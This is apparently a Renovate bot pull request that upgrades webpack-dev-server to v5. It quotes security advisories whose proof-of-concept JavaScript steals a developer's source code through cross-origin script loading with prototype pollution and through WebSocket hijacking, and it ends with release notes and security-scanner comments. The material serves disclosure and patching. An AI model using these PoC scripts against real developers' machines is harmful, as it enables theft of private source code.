fix(deps): update dependency webpack-dev-server to v5 [security] - autoclosed by renovate[bot] · Pull Request #7369 · https-quantumblockchainai-atlassian-net/backstage

renovate · 2025-08-13T17:34:52Z

This PR contains the following updates:

Package	Change	Age	Confidence
webpack-dev-server	`^4.7.3` -> `^5.0.0`

GitHub Vulnerability Alerts

CVE-2025-30359

Summary

Source code may be stolen when you access a malicious web site.

Details

Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject <script src="http://localhost:8080/main.js"> in their site and run the script. Note that the attacker has to know the port and the output entrypoint script path. Combined with prototype pollution, the attacker can get a reference to the webpack runtime variables.
By using Function::toString against the values in __webpack_modules__, the attacker can get the source code.

PoC

Download reproduction.zip and extract it
Run npm i
Run npx webpack-dev-server
Open https://e29c9a88-a242-4fb4-9e64-b24c9d29b35b.pages.dev/
You can see the source code output in the document and the devtools console.

The script in the POC site is:

let moduleList
const onHandlerSet = (handler) => {
  console.log('h', handler)
  moduleList = handler.require.m
}

const originalArrayForEach = Array.prototype.forEach
Array.prototype.forEach = function forEach(callback, thisArg) {
  callback((handler) => {
    onHandlerSet(handler)
  })
  originalArrayForEach.call(this, callback, thisArg)
  Array.prototype.forEach = originalArrayForEach
}

const script = document.createElement('script')
script.src = 'http://localhost:8080/main.js'
script.addEventListener('load', () => {
  console.log(moduleList)
  for (const key in moduleList) {
    const p = document.createElement('p')
    const title = document.createElement('strong')
    title.textContent = key
    const code = document.createElement('code')
    code.textContent = moduleList[key].toString()
    p.append(title, ':', document.createElement('br'), code)
    document.body.appendChild(p)
  }
})
document.head.appendChild(script)

This script uses the function generated by renderRequire.

    // The require function
    function __webpack_require__(moduleId) {
        // Check if module is in cache
        var cachedModule = __webpack_module_cache__[moduleId];
        if (cachedModule !== undefined) {
            return cachedModule.exports;
        }
        // Create a new module (and put it into the cache)
        var module = __webpack_module_cache__[moduleId] = {
            // no module.id needed
            // no module.loaded needed
            exports: {}
        };
        // Execute the module function
        var execOptions = {
            id: moduleId,
            module: module,
            factory: __webpack_modules__[moduleId],
            require: __webpack_require__
        };
        __webpack_require__.i.forEach(function(handler) {
            handler(execOptions);
        });
        module = execOptions.module;
        execOptions.factory.call(module.exports, module, module.exports, execOptions.require);
        // Return the exports of the module
        return module.exports;
    }

Especially, it uses the fact that Array::forEach is called for __webpack_require__.i and execOptions contains __webpack_require__.
It uses prototype pollution against Array::forEach to extract __webpack_require__ reference.

Impact

This vulnerability can result in the source code to be stolen for users that uses a predictable port and output path for the entrypoint script.

Old content

Summary

Source code may be stolen when you use output.iife: false and access a malicious web site.

Details

When output.iife: false is set, some global variables for the webpack runtime are declared on the window object (e.g. __webpack_modules__).
Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject <script src="http://localhost:8080/main.js"> in their site and run the script. Note that the attacker has to know the port and the output entrypoint script path. By running that, the webpack runtime variables will be declared on the window object.
By using Function::toString against the values in __webpack_modules__, the attacker can get the source code.

I pointed out output.iife: false, but if there are other options that makes the webpack runtime variables to be declared on the window object, the same will apply for those cases.

PoC

Download reproduction.zip and extract it
Run npm i
Run npx webpack-dev-server
Open https://852aafa3-5f83-44da-9fc6-ea116d0e3035.pages.dev/
Open the devtools console.
You can see the content of src/index.js and other scripts loaded.

The script in the POC site is:

const script = document.createElement('script')
script.src = 'http://localhost:8080/main.js'
script.addEventListener('load', () => {
    for (const module in window.__webpack_modules__) {
        console.log(`${module}:`, window.__webpack_modules__[module].toString())
    }
})
document.head.appendChild(script)

Impact

This vulnerability can result in the source code to be stolen for users that has output.iife: false option set and uses a predictable port and output path for the entrypoint script.

CVE-2025-30360

Summary

Source code may be stolen when you access a malicious web site with non-Chromium based browser.

Details

The Origin header is checked to prevent Cross-site WebSocket hijacking from happening which was reported by CVE-2018-14732.
But webpack-dev-server always allows IP address Origin headers.
https://github.com/webpack/webpack-dev-server/blob/55220a800ba4e30dbde2d98785ecf4c80b32f711/lib/Server.js#L3113-L3127
This allows websites that are served on IP addresses to connect WebSocket.
By using the same method described in the article linked from CVE-2018-14732, the attacker get the source code.

related commit: webpack/webpack-dev-server@72efaab (note that checkHost function was only used for Host header to prevent DNS rebinding attacks so this change itself is fine.

This vulnerability does not affect Chrome 94+ (and other Chromium based browsers) users due to the non-HTTPS private access blocking feature.

PoC

Download reproduction.zip and extract it
Run npm i
Run npx webpack-dev-server
Open http://{ipaddress}/?target=http://localhost:8080&file=main with a non-Chromium browser (I used Firefox 134.0.1)
Edit src/index.js in the extracted directory
You can see the content of src/index.js

The script in the POC site is:

window.webpackHotUpdate = (...args) => {
    console.log(...args);
    for (i in args[1]) {
        document.body.innerText = args[1][i].toString() + document.body.innerText
	    console.log(args[1][i])
    }
}

let params = new URLSearchParams(window.location.search);
let target = new URL(params.get('target') || 'http://127.0.0.1:8080');
let file = params.get('file')
let wsProtocol = target.protocol === 'http:' ? 'ws' : 'wss';
let wsPort = target.port;
var currentHash = '';
var currentHash2 = '';
let wsTarget = `${wsProtocol}://${target.hostname}:${wsPort}/ws`;
ws = new WebSocket(wsTarget);
ws.onmessage = event => {
    console.log(event.data);
    if (event.data.match('"type":"ok"')) {
        s = document.createElement('script');
        s.src = `${target}${file}.${currentHash2}.hot-update.js`;
        document.body.appendChild(s)
    }
    r = event.data.match(/"([0-9a-f]{20})"/);
    if (r !== null) {
        currentHash2 = currentHash;
        currentHash = r[1];
        console.log(currentHash, currentHash2);
    }
}

Impact

This vulnerability can result in the source code to be stolen for users that uses a predictable port and uses a non-Chromium based browser.

Release Notes

webpack/webpack-dev-server (webpack-dev-server)

`v5.2.1`

Compare Source

Security

cross-origin requests are not allowed unless allowed by Access-Control-Allow-Origin header
requests with an IP addresses in the Origin header are not allowed to connect to WebSocket server unless configured by allowedHosts or it different from the Host header

The above changes may make the dev server not work if you relied on such behavior, but unfortunately they carry security risks, so they were considered as fixes.

Bug Fixes

prevent overlay for errors caught by React error boundaries (#5431) (8c1abc9)
take the first network found instead of the last one, this restores the same behavior as 5.0.4 (#5411) (ffd0b86)

`v5.2.0`

Compare Source

Features

added getClientEntry and getClientHotEntry methods to get clients entries (dc642a8)

Bug Fixes

speed up initial client bundling (145b5d0)

`v5.1.0`

Compare Source

Features

add visual progress indicators (a8f40b7)
added the app option to be Function (by default only with connect compatibility frameworks) (3096148)
allow the server option to be Function (#5275) (02a1c6d)
http2 support for connect and connect compatibility frameworks which support HTTP2 (#5267) (6509a3f)

Bug Fixes

check the platform property to determinate the target (#5269) (c3b532c)
ipv6 output (#5270) (06005e7)
replace rimraf with rm (#5162) (1a1561f)
replace default gateway (#5255) (f5f0902)
support devServer: false (#5272) (8b341cb)

5.0.4 (2024-03-19)

Bug Fixes

security: bump webpack-dev-middleware (#5112) (aab576a)

5.0.3 (2024-03-12)

Bug Fixes

types: proxy (#5101) (6e1aed3)

5.0.2 (2024-02-16)

Bug Fixes

types (#5057) (da2c24d)

5.0.1 (2024-02-13)

Bug Fixes

avoid using eval in client (#5045) (7681477)
overlay and require-trusted-types-for (#5046) (e115436)

`v5.0.4`

Compare Source

Security

cross-origin requests are not allowed unless allowed by Access-Control-Allow-Origin header
requests with an IP addresses in the Origin header are not allowed to connect to WebSocket server unless configured by allowedHosts or it different from the Host header

The above changes may make the dev server not work if you relied on such behavior, but unfortunately they carry security risks, so they were considered as fixes.

Bug Fixes

prevent overlay for errors caught by React error boundaries (#5431) (8c1abc9)
take the first network found instead of the last one, this restores the same behavior as 5.0.4 (#5411) (ffd0b86)

`v5.0.3`

Compare Source

Features

add visual progress indicators (a8f40b7)
added the app option to be Function (by default only with connect compatibility frameworks) (3096148)
allow the server option to be Function (#5275) (02a1c6d)
http2 support for connect and connect compatibility frameworks which support HTTP2 (#5267) (6509a3f)

Bug Fixes

check the platform property to determinate the target (#5269) (c3b532c)
ipv6 output (#5270) (06005e7)
replace rimraf with rm (#5162) (1a1561f)
replace default gateway (#5255) (f5f0902)
support devServer: false (#5272) (8b341cb)

5.0.4 (2024-03-19)

Bug Fixes

security: bump webpack-dev-middleware (#5112) (aab576a)

5.0.3 (2024-03-12)

Bug Fixes

types: proxy (#5101) (6e1aed3)

5.0.2 (2024-02-16)

Bug Fixes

types (#5057) (da2c24d)

5.0.1 (2024-02-13)

Bug Fixes

avoid using eval in client (#5045) (7681477)
overlay and require-trusted-types-for (#5046) (e115436)

`v5.0.2`

Compare Source

Features

add visual progress indicators (a8f40b7)
added the app option to be Function (by default only with connect compatibility frameworks) (3096148)
allow the server option to be Function (#5275) (02a1c6d)
http2 support for connect and connect compatibility frameworks which support HTTP2 (#5267) (6509a3f)

Bug Fixes

check the platform property to determinate the target (#5269) (c3b532c)
ipv6 output (#5270) (06005e7)
replace rimraf with rm (#5162) (1a1561f)
replace default gateway (#5255) (f5f0902)
support devServer: false (#5272) (8b341cb)

5.0.4 (2024-03-19)

Bug Fixes

security: bump webpack-dev-middleware (#5112) (aab576a)

5.0.3 (2024-03-12)

Bug Fixes

types: proxy (#5101) (6e1aed3)

5.0.2 (2024-02-16)

Bug Fixes

types (#5057) (da2c24d)

5.0.1 (2024-02-13)

Bug Fixes

avoid using eval in client (#5045) (7681477)
overlay and require-trusted-types-for (#5046) (e115436)

`v5.0.1`

Compare Source

Features

add visual progress indicators (a8f40b7)
added the app option to be Function (by default only with connect compatibility frameworks) (3096148)
allow the server option to be Function (#5275) (02a1c6d)
http2 support for connect and connect compatibility frameworks which support HTTP2 (#5267) (6509a3f)

Bug Fixes

check the platform property to determinate the target (#5269) (c3b532c)
ipv6 output (#5270) (06005e7)
replace rimraf with rm (#5162) (1a1561f)
replace default gateway (#5255) (f5f0902)
support devServer: false (#5272) (8b341cb)

5.0.4 (2024-03-19)

Bug Fixes

security: bump webpack-dev-middleware (#5112) (aab576a)

5.0.3 (2024-03-12)

Bug Fixes

types: proxy (#5101) (6e1aed3)

5.0.2 (2024-02-16)

Bug Fixes

types (#5057) (da2c24d)

5.0.1 (2024-02-13)

Bug Fixes

avoid using eval in client (#5045) (7681477)
overlay and require-trusted-types-for (#5046) (e115436)

`v5.0.0`

Compare Source

Features

add visual progress indicators (a8f40b7)
added the app option to be Function (by default only with connect compatibility frameworks) (3096148)
allow the server option to be Function (#5275) (02a1c6d)
http2 support for connect and connect compatibility frameworks which support HTTP2 (#5267) (6509a3f)

Bug Fixes

check the platform property to determinate the target (#5269) (c3b532c)
ipv6 output (#5270) (06005e7)
replace rimraf with rm (#5162) (1a1561f)
replace default gateway (#5255) (f5f0902)
support devServer: false (#5272) (8b341cb)

5.0.4 (2024-03-19)

Bug Fixes

security: bump webpack-dev-middleware (#5112) (aab576a)

5.0.3 (2024-03-12)

Bug Fixes

types: proxy (#5101) (6e1aed3)

5.0.2 (2024-02-16)

Bug Fixes

types (#5057) (da2c24d)

5.0.1 (2024-02-13)

Bug Fixes

avoid using eval in client (#5045) (7681477)
overlay and require-trusted-types-for (#5046) (e115436)

`v4.15.2`

Compare Source

4.15.2 (2024-03-20)

Bug Fixes

security: bump webpack-dev-middleware (4116209)

`v4.15.1`

Compare Source

Migration Guide and Changes.

4.15.1 (2023-06-09)

Bug Fixes

replace :: with localhost before openBrowser() (#4856) (874c44b)
types: compatibility with @types/ws (#4899) (34bcec2)

`v4.15.0`

Compare Source

Migration Guide and Changes.

4.15.1 (2023-06-09)

Bug Fixes

replace :: with localhost before openBrowser() (#4856) (874c44b)
types: compatibility with @types/ws (#4899) (34bcec2)

`v4.14.0`

Compare Source

Features

allow CLI to be ESM (#4837) (bb4a5d9)
allow filter overlay errors/warnings with function (#4813) (aab01b3)

4.13.3 (2023-04-15)

Bug Fixes

perf: reduced initial start time (#4818) (fcf01d1)

4.13.2 (2023-03-31)

Bug Fixes

prevent open 0.0.0.0 in browser due windows problems (04e74f2)

4.13.1 (2023-03-18)

Bug Fixes

make webpack optional peer dependency (#4778) (71be54e)

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

codesandbox · 2025-08-13T17:34:56Z

Review or Edit in CodeSandbox

Open the branch in Web Editor • VS Code • Insiders

Open Preview

snyk-io · 2025-08-13T17:35:07Z

🎉 Snyk checks have passed. No issues have been found so far.

✅ security/snyk check is complete. No issues have been found. (View Details)

socket-security · 2025-08-13T17:36:06Z

Review the following changes in direct dependencies. Learn more about Socket for GitHub.

Diff	Package	Supply Chain Security	Vulnerability	Quality	Maintenance	License
	@types/commander@2.12.2
	@types/classnames@2.3.1
	@types/jwt-decode@3.1.0
	@types/ansi-regex@5.0.0
	@esbuild/android-arm64@0.18.16
	@esbuild/darwin-arm64@0.18.16
	@esbuild/darwin-x64@0.18.16
	@esbuild/freebsd-arm64@0.18.16
	@esbuild/freebsd-x64@0.18.16
	@esbuild/linux-arm@0.18.16
	@esbuild/linux-arm64@0.18.16
	@esbuild/linux-ia32@0.18.16
	@esbuild/linux-loong64@0.18.16
	@esbuild/linux-mips64el@0.18.16
	@esbuild/linux-ppc64@0.18.16
	@esbuild/linux-riscv64@0.18.16
	@esbuild/linux-s390x@0.18.16
	@esbuild/linux-x64@0.18.16
	@esbuild/openbsd-x64@0.18.16
	@esbuild/sunos-x64@0.18.16
	@esbuild/win32-arm64@0.18.16
	@esbuild/win32-ia32@0.18.16
	@esbuild/win32-x64@0.18.16
	@esbuild/netbsd-x64@0.18.16
	@mui/core-downloads-tracker@5.12.2
	@types/is-ci@3.0.0
	@types/btoa-lite@1.0.0
	@aws-sdk/is-array-buffer@3.310.0
	@aws-sdk/hash-blob-browser@3.370.0
	@smithy/is-array-buffer@1.0.2
See 406 more rows in the dashboard

View full report

socket-security · 2025-08-13T17:36:08Z

Warning

Review the following alerts detected in dependencies.

According to your organization's Security Policy, it is recommended to resolve "Warn" alerts. Learn more about Socket for GitHub.

Action	Severity	Alert (click "▶" to expand/collapse)
Warn		`jsonpath-plus@7.1.0` has a Critical CVE. CVE: GHSA-pppg-cpfq-h7wr JSONPath Plus Remote Code Execution (RCE) Vulnerability (CRITICAL) Affected versions: < 10.2.0 Patched version: 10.2.0 From: yarn.lock → `npm/@stoplight/spectral-core@1.18.0` → `npm/jsonpath-plus@7.1.0` ℹ Read more on: This package \| This alert \| What is a critical CVE? Next steps: Take a moment to review the security alert above. Review the linked package source code to understand the potential risk. Ensure the package is not malicious before proceeding. If you're unsure how to proceed, reach out to your security team or ask the Socket team for help at `support@socket.dev`. Suggestion: Remove or replace dependencies that include known critical CVEs. Consumers can use dependency overrides or npm audit fix --force to remove vulnerable dependencies. Mark the package as acceptable risk. To ignore this alert only in this pull request, reply with the comment `@SocketSecurity ignore npm/jsonpath-plus@7.1.0`. You can also ignore all packages with `@SocketSecurity ignore-all`. To ignore an alert for all future pull requests, use Socket's Dashboard to change the triage state of this alert.

View full report

github-actions · 2025-08-20T17:45:33Z